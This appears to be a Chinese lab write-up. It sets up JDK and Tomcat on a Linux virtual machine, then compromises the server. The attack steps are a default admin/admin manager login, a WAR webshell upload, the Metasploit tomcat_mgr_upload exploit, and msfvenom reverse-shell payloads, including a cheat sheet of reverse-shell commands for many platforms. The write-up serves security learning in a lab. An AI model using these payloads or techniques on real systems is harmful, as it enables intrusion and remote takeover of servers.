操作流程(环境搭建-实践操作)
在linux虚拟机上安装jdk
新创建linux虚拟机
通过mobaxterm连接虚拟机
![v2-1587e7fd3cf96009f8129bc34dea5cfb_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4b869cb4f03f605c0de37a8166b8e4e2.png)
导入tomcat安装包与jdk安装包
apache-tomcat-7.0.92.tar
jdk-8u201-linux-x64.tar.gz
![v2-00aca0442fdfd7cb9be4889721d40248_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/179fd98a2ce91d15945edb4a1d1bb66a.png)
查询环境中是否存在java
yum list installed |grep java
![v2-0846ad52389d8e52b4932b3aad2fbdd5_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/be8af4f227fda52380a5677f527b176a.png)
创建jdk的路径 /usr/java/
mkdir /usr/java/
![v2-6620a0ba154aef151e529b66735edb31_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5bccd8c62c1132d8273d7acacd6f8bf6.png)
![v2-3f21b04db8c336303df286b1a24f70f0_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/18c55224e4d75e58cea202d8b4bd0078.png)
将jdk包解压
tar -zxvf jdk-8u201-linux-x64.tar.gz
![v2-abbd9c34b70e41a46b9c6153fe5e2827_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/bb6f753ce6cb939971193563cb00c841.png)
![v2-7f41013d55db1e0e12d008a7761b44d5_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/425fdad7f1e98ecc9deae8672e0a5e4a.png)
将jdk 1.8.0_201移动到创建的?usr/java/下
mv jdk1.8.0_201/ /usr/java
![v2-2d399a7d8af6f0ec18a7adb668670753_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/d6621d34f4e9390682fc1de9d997737b.png)
建立短链接
ln -s /usr/java/jdk1.8.0_201/ /usr/jdk
![v2-b7892cbb5be621b452dec62350da8cb4_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/c3d22b6dd564e04a84bfc4b19b9b8d19.png)
编辑配置文件,配置环境变量
vim /etc/profile
添加
export JAVA_HOME=/usr/java/jdk1.8.0_201
export JRE_HOME=${JAVA_HOME}/jre
export CLASSPATH=.:${JAVA_HOME}/lib:${JRE_HOME}/lib
export PATH=${JAVA_HOME}/bin:$PATH
![v2-193deea6e9f347fa2c08e035ec80b38c_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/fe06a4f225b7a410de93a6f4370d5122.png)
重新加载配置文件/etc/profile
source /etc/profile
也可以使用sudo shutdown -r now重启,但是客户环境的服务器一般是不允许重启的
![v2-ccc5b152de0a449cf3e691924ebca27c_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/59cd2ee2092dd266269b066e94f41d87.png)
查看java版本
![v2-8c083df09d1c134cc2eff33907492889_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/181bc989df9c7b2a67d7fdd39f1247ba.png)
运行命令 javac
![v2-9bee5db303e981f4d8b5cdc8bf85d48b_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/1b43ee569e20311f15d6592f23446ace.png)
在linux虚拟机上安装tomcat
创建一个tomcat目录
mkdir /usr/tomcat
![v2-9d4aa0c0b51cd088d2122950032c0ab7_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/033f750efe6ca41b5b90c1f014431815.png)
解压tomcat安装包
![v2-d53c36ed393e4057ea383e4122aff998_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/fbb1bb6b60ce776968301ed067c88b9f.png)
![v2-527c32a19d2bc69256fd42edc8b35381_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/3366d13fc6613882f6f0afbfbaa71261.png)
解压成功
将解压内容移动至 /usr/tomcat
mv apache-tomcat-7.0.92/ /usr/tomcat
![v2-6a1816897866e09f705c937bee056c0f_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/a3bfcb7fd9346c74db6287a19f09d015.png)
生成链接以便版本升级
ln -s apache-tomcat-7.0.92 server
![v2-88a0053587056cc162e613f7f5872622_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/ce5a660a5ae3aca77468e8d467a8aa26.png)
启动tomcat
在usr/tomcat/server/bin 执行 ./startup.sh
![v2-248623b25798deddebbfe59226275ab3_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/6f1f5e649a461cdf7a3e4c3ab73218b0.png)
![v2-e603f5aeb96052d93203cec565f4e024_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/640a168bba8120726b5042f829b4fa32.png)
关闭防火墙(考虑到安全因素,不可取)
![v2-f13b3142b09250d9bd8923edfddc9812_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/794be9dce272e3a39dec513d98c5d6ae.png)
或者编辑防火墙配置文件
vim /etc/sysconfig/iptables
添加需要的端口
![v2-c9b677c4c6a17bdd1b737b47b1e33a62_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/12e1a65e650fab08f76c9bf105743de6.png)
添加的端口需要在
-A INPUT -j REJECT --reject-with icmp-host-prohibited
之上才会生效
重启防火墙服务
![v2-aeb284566b348d94584f61f3484e2871_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/185ae0f05c73aebfe5f7b7f86ef020be.png)
查看防火墙端口状态
![v2-2b446a2da3651b5092abe70db236cbd8_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/585c47ef486195a5251594a4ab91b869.png)
访问页面
![v2-35a287c27a64237be152eff6596f3bf1_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/eaae7cc9c673024e226b3e755e9597c3.jpeg)
演练开始:
https://www.cnblogs.com/bmjoker/p/9892653.html
环境搭建好了
![v2-471f7d9f5830806966f1b574042ac6fc_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/092e66d9d6b362123dbb70d5a7f6545e.jpeg)
一、上传war包(马儿连接)
1、尝试弱口令默认密码登录 admin/admin
![v2-f3c2c98ad80ab9a2f289928fe661f377_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/26e0c12550d0e54db9077c1a15d1bf34.jpeg)
2、成功登录manager管理后台
![v2-1a464a9ccb94f5f97de3dc0315c6ae11_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/44d81bf7d678d18c9e0a8cae22af016c.jpeg)
3、上传war包
上传成功解析成功
![v2-7d5f5ec043cbce838985e8a3922d1d10_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b857a2ccfb19002200f2254e534108e5.jpeg)
4、访问war网站内容(内容解析)
http://192.168.0.106:8080/war/
![v2-c69189d7d274ea03e0add926d7cb4885_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/59474ab7b42fb14903672903b3481d68.jpeg)
5、可以执行命令(菜刀连接)
![v2-513110ba2d69fe900a0fb792329ad4be_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/27b06e1eafe531f56a635ba05b39d8cc.jpeg)
获取到系统的权限
![v2-1fb0501fbca361be4a6960ad18727eee_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/ab4a78c2e51f5e233f63a1e8219809cd.jpeg)
二、MSF反弹getshell
exploit/multi/http/tomcat_mgr_upload
![v2-81062a5b0f4f1f24a021dfafdcc3da57_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/584d09988a3bd35fe763c4d22ce917d9.jpeg)
执行ls
![v2-56988320bddd2b7a532074ee7fcb2e40_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/4708f3205cea6bd7f8d771364e894211.jpeg)
还能查看 etc/passwd
![v2-c710109d8f17c1faea431156ca299256_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/c096b1c66778efa7fd29d3547141059b.jpeg)
三、msfvenom来作一个后门反弹webshell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.182.144 LPORT=1111 -f elf > shell.elf
![v2-e61110d9aead6114e069b6a2b87b5d6a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/ecbfbf104d6d9e6d85a9817c8c860bcf.jpeg)
其他类型的制作的msf反弹webshell
Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfWindowsmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exeMacmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.machoWeb PayloadsPHPmsfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.phpcat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.phpASPmsfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.aspJSPmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jspWARmsfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.warScripting PayloadsPythonmsfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pyBashmsfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.shPerlmsfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
执行
![v2-40ee2b5a78ee743af837c2c889c59e97_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/5fc493ec2a72dbfad1d163a395182955.jpeg)
反弹回来了
![v2-0f77c67c96acbeeea8648ad16f5c032b_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/b3e76d9400b0b6738df6fa7fb32c5cc0.jpeg)
总结:
1、就是靶站搭建的时候会刚刚下载的tomcat的默认的没有manger和其他的admin的管理界面的,需要自己器调整conf/tomcat-user.xml才能进行后续的实验。
![v2-cfe4e3aa90a8f776b267ce0b625b112a_b.jpg](https://i-blog.csdnimg.cn/blog_migrate/6a8692581fc67b74e9734a312c322d32.jpeg)
2、就是需要手动的安装JDK8以上。
3、开始在靶机上面开启服务一直不能msf连接上,需要重启,调节Linux的net work设置,获取同一网段,才好后面的反弹shell的操作。
4、注意msf的webshell制作过程,那个lhost和lport的IP上远程监听的IP。